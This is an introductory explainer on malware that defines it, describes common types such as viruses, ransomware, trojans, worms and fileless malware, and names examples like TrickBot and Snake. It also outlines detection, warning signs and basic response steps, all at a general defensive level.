Gain a better understanding of what malware is, what it isn't, and how you can prevent and detect its presence in your environment before the crown jewels are compromised.
In this 101, we’re going to cover:
Malware refers to any piece of software developed with the intent of causing harm to a computer, program, device, or user. The developer's purpose is central to the definition, as many software programs can cause unintended damage if misused. Malware is different because malicious actors explicitly design these programs to infiltrate systems and damage or disable their functionality.
Common motives for creating malware typically involve making money, with cybercriminals leveraging stolen computer resources or data for profit. Malware can also be part of a coordinated attack, from state actors infiltrating government or corporate systems to steal technology, proprietary information, or actionable intelligence or disable critical systems like power and communications technology.
Malware stands for malicious software and acts as a collective term that includes several variants. Viruses, trojans, worms, ransomware, and unauthorized spyware are all considered malware.
Even though malware includes various malicious tools and techniques, the attack patterns are broadly consistent. Typically, a malware attack begins when a user unknowingly installs malware on an endpoint device. The delivery method could be email, USB drive, or a download. Some malware can even spread without any direct installation by the user. Examples of this include visiting a website or drive-by download attacks, which don't require any action from the user.
There are many ways that users get exposed to malware. Social engineering attacks like phishing and spear-phishing are expected, with malicious software hidden within an email attachment. Peer-to-peer file-sharing services and illegal streaming activity also regularly deliver malware to unsuspecting users.
Cybercriminals and the attacks they perpetrate become increasingly more sophisticated every year. Here are a few examples of the most common categories of malware:
Viruses have long been the most common and well-known form of malware. Viruses infect legitimate executable binaries to execute the malicious code when the infected program runs. Similar to their biological counterparts, what makes viruses so dangerous is how quickly they can spread between systems. That quick spread often results in corrupted files and programs or total system lockouts.
Ransomware attacks typically work by infecting systems containing valuable or compromising information. The malware seeks out critical data and encrypts it, denying the system owner access to their data. Successful Ransomware attacks can have a tremendous impact on individuals and organizations, resulting in embarrassing data leaks, theft, and privacy breaches.
Trojan Horses are malware that disguises themselves as a trusted or legitimate program to trick users into executing its malicious code.
Worms are a unique form of malware with the capability to self-replicate. These programs duplicate themselves to infect other systems in the network.
Rather than relying on executable binary files, Fileless Malware exploits tools built-in to the operating system to conduct their attacks.
Since most malware infections occur from virus downloads or malicious links in email communications, anti-virus software and email security are the most reliable malware detection methods. However, as malware and cyberattacks, in general, continue to become more sophisticated, many individuals and organizations find that traditional security software is insufficient to counter the latest threats. Many companies turn to robust Extended Detection and Response capabilities powered by AI and machine learning to detect and counter emerging, day-zero vulnerabilities.
There are also some warning signs that users and system administrators can observe on their systems that may signal a malware infection. Users should be wary of unwanted popups or if unknown programs appear on the device. Unusual network or hardware performance could indicate that unauthorized software is hogging system resources.
Here are a few examples of real-world malware programs:
TrickBot is a Trojan spyware program originating in 2016, used recently in several attacks targeting the financial sector.
Anchor has been a relatively new form of malware in operation since 2018. This TrickBot malware extension adds a new and enhanced stealing module that steals passwords from a password management software program.
Snake is feature-rich information-stealing malware containing keystroke logging, clipboard data, screenshot, and credential theft capabilities.
Recent research uncovered a new malware strain acting as a dropper targeting .NET code. A dropper is a Trojan Horse designed to install other malware on a device. The particular dropper discovered in the research also contained a peculiar yet troublesome capability to disable research tools, thus making it harder to detect with tools like Wireshark.
When users suspect malware infected their system, they should immediately acquire and run anti-malware software to scan their system and detect any present threats. Once the anti-malware software cleans the system and isolates the threat, users should update their passwords and ensure their email and essential accounts are not compromised.
Users should consider implementing automated detection and response capabilities to help shut down malware attacks before critical systems become infected.